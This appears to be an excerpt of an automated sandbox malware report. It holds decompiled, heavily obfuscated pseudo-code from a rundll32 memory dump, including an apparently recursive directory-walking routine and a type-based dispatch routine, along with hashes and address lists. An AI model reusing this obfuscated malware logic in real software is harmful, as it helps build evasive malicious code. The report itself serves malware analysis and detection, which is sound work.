                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Fo$M_o9$[K
                                                                                                                    • API String ID: 0-3743190696
                                                                                                                    • Opcode ID: 7d5a0227600bc21eef372dc0c5521c185b2a2fd5fb268aceacf48065997ad4d8
                                                                                                                    • Instruction ID: 9f957ff0c2a790d19bd3b89ea8bfc5f8c65ff4c852abdf689d619fb530c9f085
                                                                                                                    • Opcode Fuzzy Hash: 7d5a0227600bc21eef372dc0c5521c185b2a2fd5fb268aceacf48065997ad4d8
                                                                                                                    • Instruction Fuzzy Hash: BD120EB14093818FD369CF21C58AA9BBBF1FBC5748F10891DE5DA9A260D7B18909CF53
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 80%
                                                                                                                    			E00339DCF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v108;
                                                                                                                    				signed int _v112;
                                                                                                                    				signed int _v116;
                                                                                                                    				signed int _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				intOrPtr _v136;
                                                                                                                    				char _v160;
                                                                                                                    				short _v708;
                                                                                                                    				short _v710;
                                                                                                                    				char _v712;
                                                                                                                    				signed int _v756;
                                                                                                                    				char _v1276;
                                                                                                                    				char _v1796;
                                                                                                                    				void* _t278;
                                                                                                                    				signed int _t306;
                                                                                                                    				signed int _t310;
                                                                                                                    				void* _t312;
                                                                                                                    				intOrPtr _t317;
                                                                                                                    				void* _t319;
                                                                                                                    				signed int _t324;
                                                                                                                    				void* _t327;
                                                                                                                    				void* _t353;
                                                                                                                    				signed int _t365;
                                                                                                                    				signed int _t366;
                                                                                                                    				signed int _t367;
                                                                                                                    				signed int _t368;
                                                                                                                    				signed int _t369;
                                                                                                                    				signed int _t370;
                                                                                                                    				void* _t373;
                                                                                                                    				void* _t374;
                                                                                                                    
                                                                                                                    				_t317 = _a12;
                                                                                                                    				_push(_a24);
                                                                                                                    				_push(_a20);
                                                                                                                    				_push(_a16);
                                                                                                                    				_push(_t317);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t278);
                                                                                                                    				_v44 = 0x411c30;
                                                                                                                    				_t374 = _t373 + 0x20;
                                                                                                                    				_v44 = _v44 ^ 0x3aebcc2b;
                                                                                                                    				_v44 = _v44 ^ 0x10090153;
                                                                                                                    				_t319 = 0x338c922;
                                                                                                                    				_v44 = _v44 ^ 0x2aa3d158;
                                                                                                                    				_v56 = 0xa7c140;
                                                                                                                    				_v56 = _v56 >> 1;
                                                                                                                    				_v56 = _v56 ^ 0xbf613798;
                                                                                                                    				_v56 = _v56 ^ 0xbf3c535c;
                                                                                                                    				_v88 = 0xb7ebf9;
                                                                                                                    				_t365 = 0x52;
                                                                                                                    				_v88 = _v88 / _t365;
                                                                                                                    				_v88 = _v88 ^ 0x0004e01e;
                                                                                                                    				_v112 = 0x1a3e5b;
                                                                                                                    				_v112 = _v112 + 0xd588;
                                                                                                                    				_v112 = _v112 ^ 0x0012c9bc;
                                                                                                                    				_v8 = 0x55b84a;
                                                                                                                    				_t366 = 0x72;
                                                                                                                    				_v8 = _v8 * 0x74;
                                                                                                                    				_v8 = _v8 + 0xffff07de;
                                                                                                                    				_v8 = _v8 * 0x41;
                                                                                                                    				_v8 = _v8 ^ 0xdc74eedb;
                                                                                                                    				_v96 = 0x123c4e;
                                                                                                                    				_v96 = _v96 + 0x1d06;
                                                                                                                    				_v96 = _v96 ^ 0x001f978b;
                                                                                                                    				_v124 = 0x58f8d3;
                                                                                                                    				_v124 = _v124 * 0x2b;
                                                                                                                    				_v124 = _v124 ^ 0x0efbe47e;
                                                                                                                    				_v120 = 0x58d481;
                                                                                                                    				_v120 = _v120 << 5;
                                                                                                                    				_v120 = _v120 ^ 0x0b1fdd63;
                                                                                                                    				_v32 = 0x85548e;
                                                                                                                    				_v32 = _v32 / _t366;
                                                                                                                    				_v32 = _v32 * 0x2e;
                                                                                                                    				_v32 = _v32 ^ 0x0037cfdf;
                                                                                                                    				_v108 = 0x851b7a;
                                                                                                                    				_v108 = _v108 | 0xf3ff5f40;
                                                                                                                    				_v108 = _v108 ^ 0xf3fc1521;
                                                                                                                    				_v76 = 0x86d28f;
                                                                                                                    				_v76 = _v76 >> 0xd;
                                                                                                                    				_v76 = _v76 ^ 0x000a85f2;
                                                                                                                    				_v48 = 0x8a8988;
                                                                                                                    				_v48 = _v48 + 0xffff9d54;
                                                                                                                    				_v48 = _v48 + 0xffffb441;
                                                                                                                    				_v48 = _v48 ^ 0x008c2bbe;
                                                                                                                    				_v80 = 0x3fe2a4;
                                                                                                                    				_v80 = _v80 ^ 0x5e00b743;
                                                                                                                    				_v80 = _v80 ^ 0x5e39b1b0;
                                                                                                                    				_v116 = 0x4ea08b;
                                                                                                                    				_v116 = _v116 + 0xffffca32;
                                                                                                                    				_v116 = _v116 ^ 0x00427ef9;
                                                                                                                    				_v104 = 0xba6181;
                                                                                                                    				_v104 = _v104 + 0xf529;
                                                                                                                    				_v104 = _v104 ^ 0x00b33727;
                                                                                                                    				_v52 = 0x1e8210;
                                                                                                                    				_v52 = _v52 >> 8;
                                                                                                                    				_v52 = _v52 | 0xffb97487;
                                                                                                                    				_v52 = _v52 ^ 0xffb16a42;
                                                                                                                    				_v40 = 0xeabfd3;
                                                                                                                    				_v40 = _v40 ^ 0x26644279;
                                                                                                                    				_t367 = 0x3a;
                                                                                                                    				_v40 = _v40 / _t367;
                                                                                                                    				_v40 = _v40 ^ 0x00a36ea5;
                                                                                                                    				_v12 = 0xc9f67b;
                                                                                                                    				_v12 = _v12 + 0x836b;
                                                                                                                    				_v12 = _v12 | 0xa1408986;
                                                                                                                    				_t368 = 0x45;
                                                                                                                    				_v12 = _v12 * 0x75;
                                                                                                                    				_v12 = _v12 ^ 0xf1cc1c9a;
                                                                                                                    				_v36 = 0x1f6921;
                                                                                                                    				_v36 = _v36 ^ 0x9bf749ed;
                                                                                                                    				_v36 = _v36 / _t368;
                                                                                                                    				_v36 = _v36 ^ 0x024ed910;
                                                                                                                    				_v64 = 0x37ccf2;
                                                                                                                    				_v64 = _v64 + 0xfffff775;
                                                                                                                    				_t369 = 0x19;
                                                                                                                    				_v64 = _v64 * 0x24;
                                                                                                                    				_v64 = _v64 ^ 0x07d7b77b;
                                                                                                                    				_v28 = 0x370f8;
                                                                                                                    				_v28 = _v28 << 0xd;
                                                                                                                    				_v28 = _v28 + 0x6470;
                                                                                                                    				_v28 = _v28 >> 1;
                                                                                                                    				_v28 = _v28 ^ 0x37097055;
                                                                                                                    				_v20 = 0x84152c;
                                                                                                                    				_v20 = _v20 * 0x7e;
                                                                                                                    				_v20 = _v20 / _t369;
                                                                                                                    				_v20 = _v20 << 0xe;
                                                                                                                    				_v20 = _v20 ^ 0x6c90d6a3;
                                                                                                                    				_v60 = 0x687dd9;
                                                                                                                    				_t370 = 0xc;
                                                                                                                    				_v60 = _v60 * 0x1d;
                                                                                                                    				_v60 = _v60 << 7;
                                                                                                                    				_v60 = _v60 ^ 0xeb212648;
                                                                                                                    				_v84 = 0xd09924;
                                                                                                                    				_v84 = _v84 * 0x7c;
                                                                                                                    				_v84 = _v84 ^ 0x650614c5;
                                                                                                                    				_v100 = 0x3804f2;
                                                                                                                    				_v100 = _v100 | 0x9eb8052c;
                                                                                                                    				_v100 = _v100 ^ 0x9eb506d7;
                                                                                                                    				_v92 = 0xf492b0;
                                                                                                                    				_v92 = _v92 + 0xffffc4ae;
                                                                                                                    				_v92 = _v92 ^ 0x00fafa5e;
                                                                                                                    				_v16 = 0xd0e41e;
                                                                                                                    				_v16 = _v16 * 0x3d;
                                                                                                                    				_v16 = _v16 >> 0xd;
                                                                                                                    				_v16 = _v16 >> 0xe;
                                                                                                                    				_v16 = _v16 ^ 0x000dc1c9;
                                                                                                                    				_v24 = 0x66d2fe;
                                                                                                                    				_v24 = _v24 / _t370;
                                                                                                                    				_v24 = _v24 + 0xffffccd2;
                                                                                                                    				_v24 = _v24 ^ 0x0a93dd72;
                                                                                                                    				_v24 = _v24 ^ 0x0a9c564f;
                                                                                                                    				_v72 = 0xbcf4e;
                                                                                                                    				_v72 = _v72 >> 7;
                                                                                                                    				_v72 = _v72 ^ 0x000c8ddf;
                                                                                                                    				_t364 = _v72;
                                                                                                                    				_v68 = 0x4616df;
                                                                                                                    				_v68 = _v68 + 0x9c8e;
                                                                                                                    				_v68 = _v68 + 0xaaef;
                                                                                                                    				_v68 = _v68 ^ 0x004c065d;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_t353 = 0x2e;
                                                                                                                    					L2:
                                                                                                                    					while(_t319 != 0x21229d9) {
                                                                                                                    						if(_t319 == 0x338c922) {
                                                                                                                    							_v136 = _t317;
                                                                                                                    							_t319 = 0x9035918;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t319 == 0x5b964d8) {
                                                                                                                    							__eflags = _v756 & _v44;
                                                                                                                    							if(__eflags == 0) {
                                                                                                                    								_t306 = _a16( &_v756,  &_v160);
                                                                                                                    								asm("sbb ecx, ecx");
                                                                                                                    								_t324 =  ~_t306 & 0x09c7cc54;
                                                                                                                    								L9:
                                                                                                                    								_t319 = _t324 + 0x21229d9;
                                                                                                                    								while(1) {
                                                                                                                    									L1:
                                                                                                                    									_t353 = 0x2e;
                                                                                                                    									goto L2;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							__eflags = _v712 - _t353;
                                                                                                                    							if(_v712 != _t353) {
                                                                                                                    								L19:
                                                                                                                    								__eflags = _a24;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									_push(_v104);
                                                                                                                    									_push(_v116);
                                                                                                                    									_t312 = E0034DCF7(_v80, 0x3317a0, __eflags);
                                                                                                                    									_pop(_t327);
                                                                                                                    									E003347CE(_t317, _v52, _t327, _v40, _v12, _t312,  &_v712, _v36, _v64);
                                                                                                                    									E00339DCF(_v28, _v20, _v60, _a8,  &_v1276, _a16, _v84, _a24);
                                                                                                                    									_t310 = E0033A8B0(_v100, _t312, _v92);
                                                                                                                    									_t374 = _t374 + 0x3c;
                                                                                                                    									_t353 = 0x2e;
                                                                                                                    								}
                                                                                                                    								L18:
                                                                                                                    								_t319 = 0xbd9f62d;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    							__eflags = _v710;
                                                                                                                    							if(__eflags == 0) {
                                                                                                                    								goto L18;
                                                                                                                    							}
                                                                                                                    							__eflags = _v710 - _t353;
                                                                                                                    							if(_v710 != _t353) {
                                                                                                                    								goto L19;
                                                                                                                    							}
                                                                                                                    							__eflags = _v708;
                                                                                                                    							if(__eflags != 0) {
                                                                                                                    								goto L19;
                                                                                                                    							}
                                                                                                                    							goto L18;
                                                                                                                    						}
                                                                                                                    						if(_t319 == 0x9035918) {
                                                                                                                    							_push(_v112);
                                                                                                                    							_push(_v88);
                                                                                                                    							E0033A918(_t317, __eflags, _v8, _v96, E0034DCF7(_v56, 0x331770, __eflags), _v124,  &_v1796);
                                                                                                                    							_t374 = _t374 + 0x1c;
                                                                                                                    							_t310 = E0033A8B0(_v120, _t307, _v32);
                                                                                                                    							_t319 = 0xb066d4a;
                                                                                                                    							while(1) {
                                                                                                                    								L1:
                                                                                                                    								_t353 = 0x2e;
                                                                                                                    								goto L2;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						if(_t319 == 0xb066d4a) {
                                                                                                                    							_t310 = E00337E00(_v108,  &_v756, _v76, _v48,  &_v1796);
                                                                                                                    							_t364 = _t310;
                                                                                                                    							_t374 = _t374 + 0xc;
                                                                                                                    							__eflags = _t310 - 0xffffffff;
                                                                                                                    							if(__eflags == 0) {
                                                                                                                    								L25:
                                                                                                                    								return _t310;
                                                                                                                    							}
                                                                                                                    							_t319 = 0x5b964d8;
                                                                                                                    							goto L1;
                                                                                                                    						}
                                                                                                                    						if(_t319 != 0xbd9f62d) {
                                                                                                                    							L24:
                                                                                                                    							__eflags = _t319 - 0xa89df2;
                                                                                                                    							if(__eflags != 0) {
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    							goto L25;
                                                                                                                    						}
                                                                                                                    						_t310 = E00334635(_v16,  &_v756, _t364, _v24);
                                                                                                                    						asm("sbb ecx, ecx");
                                                                                                                    						_t324 =  ~_t310 & 0x03a73aff;
                                                                                                                    						goto L9;
                                                                                                                    					}
                                                                                                                    					E00338ABF(_t364, _v72, _v68);
                                                                                                                    					_t319 = 0xa89df2;
                                                                                                                    					_t353 = 0x2e;
                                                                                                                    					goto L24;
                                                                                                                    				}
                                                                                                                    			}


























































                                                                                                                    0x0033a075
                                                                                                                    0x0033a07c
                                                                                                                    0x0033a083
                                                                                                                    0x0033a08a
                                                                                                                    0x0033a091
                                                                                                                    0x0033a098
                                                                                                                    0x0033a09f
                                                                                                                    0x0033a0aa
                                                                                                                    0x0033a0ad
                                                                                                                    0x0033a0b1
                                                                                                                    0x0033a0b5
                                                                                                                    0x0033a0bc
                                                                                                                    0x0033a0c8
                                                                                                                    0x0033a0cb
                                                                                                                    0x0033a0d2
                                                                                                                    0x0033a0d9
                                                                                                                    0x0033a0e0
                                                                                                                    0x0033a0e7
                                                                                                                    0x0033a0eb
                                                                                                                    0x0033a0f2
                                                                                                                    0x0033a0f5
                                                                                                                    0x0033a0fc
                                                                                                                    0x0033a103
                                                                                                                    0x0033a10a
                                                                                                                    0x0033a111
                                                                                                                    0x0033a111
                                                                                                                    0x0033a113
                                                                                                                    0x00000000
                                                                                                                    0x0033a114
                                                                                                                    0x0033a126
                                                                                                                    0x0033a2d3
                                                                                                                    0x0033a2d9
                                                                                                                    0x00000000
                                                                                                                    0x0033a2d9
                                                                                                                    0x0033a132
                                                                                                                    0x0033a1fa
                                                                                                                    0x0033a200
                                                                                                                    0x0033a2bf
                                                                                                                    0x0033a2c6
                                                                                                                    0x0033a2c8
                                                                                                                    0x0033a174
                                                                                                                    0x0033a174
                                                                                                                    0x0033a111
                                                                                                                    0x0033a111
                                                                                                                    0x0033a113
                                                                                                                    0x00000000
                                                                                                                    0x0033a113
                                                                                                                    0x0033a111
                                                                                                                    0x0033a206
                                                                                                                    0x0033a20d
                                                                                                                    0x0033a236
                                                                                                                    0x0033a236
                                                                                                                    0x0033a23a
                                                                                                                    0x0033a23c
                                                                                                                    0x0033a244
                                                                                                                    0x0033a24a
                                                                                                                    0x0033a250
                                                                                                                    0x0033a273
                                                                                                                    0x0033a294
                                                                                                                    0x0033a2a1
                                                                                                                    0x0033a2a6
                                                                                                                    0x0033a2ab
                                                                                                                    0x0033a2ab
                                                                                                                    0x0033a22c
                                                                                                                    0x0033a22c
                                                                                                                    0x00000000
                                                                                                                    0x0033a22c
                                                                                                                    0x0033a20f
                                                                                                                    0x0033a217
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033a219
                                                                                                                    0x0033a220
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033a222
                                                                                                                    0x0033a22a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033a22a
                                                                                                                    0x0033a13e
                                                                                                                    0x0033a1af
                                                                                                                    0x0033a1b7
                                                                                                                    0x0033a1d7
                                                                                                                    0x0033a1dc
                                                                                                                    0x0033a1e7
                                                                                                                    0x0033a1ed
                                                                                                                    0x0033a111
                                                                                                                    0x0033a111
                                                                                                                    0x0033a113
                                                                                                                    0x00000000
                                                                                                                    0x0033a113
                                                                                                                    0x0033a111
                                                                                                                    0x0033a146
                                                                                                                    0x0033a192
                                                                                                                    0x0033a197
                                                                                                                    0x0033a199
                                                                                                                    0x0033a19c
                                                                                                                    0x0033a19f
                                                                                                                    0x0033a30b
                                                                                                                    0x0033a30b
                                                                                                                    0x0033a30b
                                                                                                                    0x0033a1a5
                                                                                                                    0x00000000
                                                                                                                    0x0033a1a5
                                                                                                                    0x0033a14e
                                                                                                                    0x0033a2f9
                                                                                                                    0x0033a2f9
                                                                                                                    0x0033a2ff
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033a2ff
                                                                                                                    0x0033a161
                                                                                                                    0x0033a16c
                                                                                                                    0x0033a16e
                                                                                                                    0x00000000
                                                                                                                    0x0033a16e
                                                                                                                    0x0033a2eb
                                                                                                                    0x0033a2f3
                                                                                                                    0x0033a2f8
                                                                                                                    0x00000000
                                                                                                                    0x0033a2f8

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: H&!$Up7$yBd&
                                                                                                                    • API String ID: 0-2352930472
                                                                                                                    • Opcode ID: 70a0e0d0504b119bee09204204805b6ab0422330564dcef010dc90ea145dab60
                                                                                                                    • Instruction ID: 7f8dcda51cf4e9d0ddea20551c84f0bead8269bf6a65010432f494b7b1d68b7f
                                                                                                                    • Opcode Fuzzy Hash: 70a0e0d0504b119bee09204204805b6ab0422330564dcef010dc90ea145dab60
                                                                                                                    • Instruction Fuzzy Hash: 8AE165B1D0021DDBCF29DFE4D98A9EEBBB1FB44314F208159E516BA264D7B40A45CF41
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E0033B2C7(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                    				char _v40;
                                                                                                                    				char _v48;
                                                                                                                    				intOrPtr _v72;
                                                                                                                    				intOrPtr _v80;
                                                                                                                    				intOrPtr _v84;
                                                                                                                    				intOrPtr _v92;
                                                                                                                    				char _v108;
                                                                                                                    				char _v112;
                                                                                                                    				signed int _v116;
                                                                                                                    				signed int _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				signed int _v136;
                                                                                                                    				signed int _v140;
                                                                                                                    				signed int _v144;
                                                                                                                    				signed int _v148;
                                                                                                                    				signed int _v152;
                                                                                                                    				signed int _v156;
                                                                                                                    				void* _t137;
                                                                                                                    				intOrPtr* _t157;
                                                                                                                    				signed int _t166;
                                                                                                                    				void* _t173;
                                                                                                                    				intOrPtr _t191;
                                                                                                                    				void* _t203;
                                                                                                                    				void* _t208;
                                                                                                                    				signed int _t209;
                                                                                                                    				signed int _t210;
                                                                                                                    				signed int _t211;
                                                                                                                    				signed int _t212;
                                                                                                                    				intOrPtr* _t213;
                                                                                                                    				void* _t215;
                                                                                                                    				void* _t216;
                                                                                                                    				void* _t218;
                                                                                                                    
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t137);
                                                                                                                    				_v136 = 0x2c5bc;
                                                                                                                    				_t216 = _t215 + 0xc;
                                                                                                                    				_t208 = 0;
                                                                                                                    				_t173 = 0xf62a13b;
                                                                                                                    				_t209 = 0x63;
                                                                                                                    				_v136 = _v136 / _t209;
                                                                                                                    				_v136 = _v136 + 0xe356;
                                                                                                                    				_v136 = _v136 ^ 0x000982ba;
                                                                                                                    				_v156 = 0x35028b;
                                                                                                                    				_v156 = _v156 | 0x143a760d;
                                                                                                                    				_v156 = _v156 + 0xfffff236;
                                                                                                                    				_v156 = _v156 ^ 0x8a3e1055;
                                                                                                                    				_v156 = _v156 ^ 0x9e033c32;
                                                                                                                    				_v128 = 0xf43d73;
                                                                                                                    				_v128 = _v128 | 0xd1983256;
                                                                                                                    				_v128 = _v128 ^ 0xd1f71de4;
                                                                                                                    				_v120 = 0x9951cf;
                                                                                                                    				_v120 = _v120 + 0xffffd11b;
                                                                                                                    				_v120 = _v120 ^ 0x00948e71;
                                                                                                                    				_v152 = 0x57fc5b;
                                                                                                                    				_v152 = _v152 | 0x88a856bb;
                                                                                                                    				_v152 = _v152 << 9;
                                                                                                                    				_v152 = _v152 + 0xa27f;
                                                                                                                    				_v152 = _v152 ^ 0xfff91174;
                                                                                                                    				_v116 = 0x3d6e6b;
                                                                                                                    				_t210 = 9;
                                                                                                                    				_v116 = _v116 / _t210;
                                                                                                                    				_v116 = _v116 ^ 0x0006b75d;
                                                                                                                    				_v140 = 0x916f20;
                                                                                                                    				_t211 = 0x35;
                                                                                                                    				_v140 = _v140 * 0x22;
                                                                                                                    				_v140 = _v140 / _t211;
                                                                                                                    				_t212 = 0x7b;
                                                                                                                    				_v140 = _v140 * 0x1d;
                                                                                                                    				_v140 = _v140 ^ 0x0a9423e2;
                                                                                                                    				_v148 = 0x96f30f;
                                                                                                                    				_v148 = _v148 ^ 0x6547be83;
                                                                                                                    				_v148 = _v148 << 9;
                                                                                                                    				_v148 = _v148 | 0xa101889a;
                                                                                                                    				_v148 = _v148 ^ 0xa391ec3d;
                                                                                                                    				_v124 = 0x9e8998;
                                                                                                                    				_v124 = _v124 | 0x73c531f9;
                                                                                                                    				_v124 = _v124 ^ 0x73d6e9c9;
                                                                                                                    				_v132 = 0xda1f74;
                                                                                                                    				_v132 = _v132 + 0x97a0;
                                                                                                                    				_v132 = _v132 ^ 0xdacfb227;
                                                                                                                    				_v132 = _v132 ^ 0xda161b2e;
                                                                                                                    				_v144 = 0x87027b;
                                                                                                                    				_t213 = _v128;
                                                                                                                    				_v144 = _v144 / _t212;
                                                                                                                    				_v144 = _v144 + 0x3568;
                                                                                                                    				_v144 = _v144 | 0x38a39b99;
                                                                                                                    				_v144 = _v144 ^ 0x38a88a96;
                                                                                                                    				while(1) {
                                                                                                                    					_t218 = _t173 - 0x628c872;
                                                                                                                    					if(_t218 > 0) {
                                                                                                                    						goto L25;
                                                                                                                    					}
                                                                                                                    					L2:
                                                                                                                    					if(_t218 == 0) {
                                                                                                                    						_push(_t173);
                                                                                                                    						_push(_t173);
                                                                                                                    						_t203 = 0x50;
                                                                                                                    						_t213 = E00337FF2(_t203);
                                                                                                                    						__eflags = _t213;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							L16:
                                                                                                                    							_t173 = 0xe7b6043;
                                                                                                                    							continue;
                                                                                                                    							do {
                                                                                                                    								while(1) {
                                                                                                                    									_t218 = _t173 - 0x628c872;
                                                                                                                    									if(_t218 > 0) {
                                                                                                                    										goto L25;
                                                                                                                    									}
                                                                                                                    									goto L2;
                                                                                                                    								}
                                                                                                                    								goto L25;
                                                                                                                    								L45:
                                                                                                                    								__eflags = _t173 - 0xee0c843;
                                                                                                                    							} while (__eflags != 0);
                                                                                                                    							L46:
                                                                                                                    							return _t208;
                                                                                                                    						}
                                                                                                                    						_t173 = 0xf1dea2;
                                                                                                                    						 *((intOrPtr*)(_t213 + 0x24)) = _v92;
                                                                                                                    						 *((intOrPtr*)(_t213 + 0x3c)) = _v80;
                                                                                                                    						 *((intOrPtr*)(_t213 + 0x20)) = _v72;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					if(_t173 == 0xf1dea2) {
                                                                                                                    						__eflags = _v84 - 1;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							E00344B87( &_v108);
                                                                                                                    							L13:
                                                                                                                    							_t173 = 0x4d68783;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						_t173 = 0x9ca47b0;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					if(_t173 == 0x1c23c86) {
                                                                                                                    						__eflags = _v84 - 4;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							E00346DF8( &_v108);
                                                                                                                    							goto L13;
                                                                                                                    						}
                                                                                                                    						_t173 = 0x6a06f56;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					if(_t173 == 0x45d7e1c) {
                                                                                                                    						_t157 = E0034D97D( &_v40, _v120, __eflags, _v152,  &_v48, _v116);
                                                                                                                    						_t216 = _t216 + 0xc;
                                                                                                                    						__eflags = _t157;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							goto L46;
                                                                                                                    						}
                                                                                                                    						goto L16;
                                                                                                                    					}
                                                                                                                    					if(_t173 == 0x483085d) {
                                                                                                                    						__eflags = _v84 - 7;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							E00340E53( &_v108);
                                                                                                                    						}
                                                                                                                    						goto L13;
                                                                                                                    					}
                                                                                                                    					if(_t173 == 0x4d68783) {
                                                                                                                    						_t191 =  *0x353208; // 0x0
                                                                                                                    						_t208 = _t208 + 1;
                                                                                                                    						 *_t213 =  *((intOrPtr*)(_t191 + 0x20c));
                                                                                                                    						 *((intOrPtr*)(_t191 + 0x20c)) = _t213;
                                                                                                                    						L10:
                                                                                                                    						_t173 = 0x45d7e1c;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					if(_t173 != 0x4fb7fc6) {
                                                                                                                    						goto L45;
                                                                                                                    					}
                                                                                                                    					E00340B19(0);
                                                                                                                    					goto L10;
                                                                                                                    					L25:
                                                                                                                    					__eflags = _t173 - 0x6a06f56;
                                                                                                                    					if(_t173 == 0x6a06f56) {
                                                                                                                    						__eflags = _v84 - 5;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							E0033B74D( &_v108, _t213);
                                                                                                                    							_t173 = 0x4d68783;
                                                                                                                    							goto L45;
                                                                                                                    						}
                                                                                                                    						_t173 = 0xcf2e7b4;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					__eflags = _t173 - 0x9a20357;
                                                                                                                    					if(_t173 == 0x9a20357) {
                                                                                                                    						__eflags = _v84 - 3;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							E00341889( &_v108);
                                                                                                                    							goto L13;
                                                                                                                    						}
                                                                                                                    						_t173 = 0x1c23c86;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					__eflags = _t173 - 0x9ca47b0;
                                                                                                                    					if(_t173 == 0x9ca47b0) {
                                                                                                                    						__eflags = _v84 - 2;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							E00339714( &_v108, _t213);
                                                                                                                    							goto L13;
                                                                                                                    						}
                                                                                                                    						_t173 = 0x9a20357;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					__eflags = _t173 - 0xcf2e7b4;
                                                                                                                    					if(_t173 == 0xcf2e7b4) {
                                                                                                                    						__eflags = _v84 - 6;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							E0033F09B( &_v108);
                                                                                                                    							goto L13;
                                                                                                                    						}
                                                                                                                    						_t173 = 0x483085d;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					__eflags = _t173 - 0xe7b6043;
                                                                                                                    					if(_t173 == 0xe7b6043) {
                                                                                                                    						_t166 = E0033E5CF( &_v48, _v140,  &_v112, _v148);
                                                                                                                    						asm("sbb ecx, ecx");
                                                                                                                    						_t173 = ( ~_t166 & 0x01cb4a56) + 0x45d7e1c;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					__eflags = _t173 - 0xf62a13b;
                                                                                                                    					if(_t173 != 0xf62a13b) {
                                                                                                                    						goto L45;
                                                                                                                    					}
                                                                                                                    					E00333DBC( &_v40, _a4, _v136, _v156, _v128);
                                                                                                                    					_t216 = _t216 + 0xc;
                                                                                                                    					_t173 = 0x4fb7fc6;
                                                                                                                    				}
                                                                                                                    			}





































                                                                                                                    0x0033b54b
                                                                                                                    0x0033b55b
                                                                                                                    0x0033b4e6
                                                                                                                    0x0033b4e6
                                                                                                                    0x00000000
                                                                                                                    0x0033b4e6
                                                                                                                    0x0033b54d
                                                                                                                    0x00000000
                                                                                                                    0x0033b54d
                                                                                                                    0x0033b49b
                                                                                                                    0x0033b52a
                                                                                                                    0x0033b52f
                                                                                                                    0x0033b53f
                                                                                                                    0x00000000
                                                                                                                    0x0033b53f
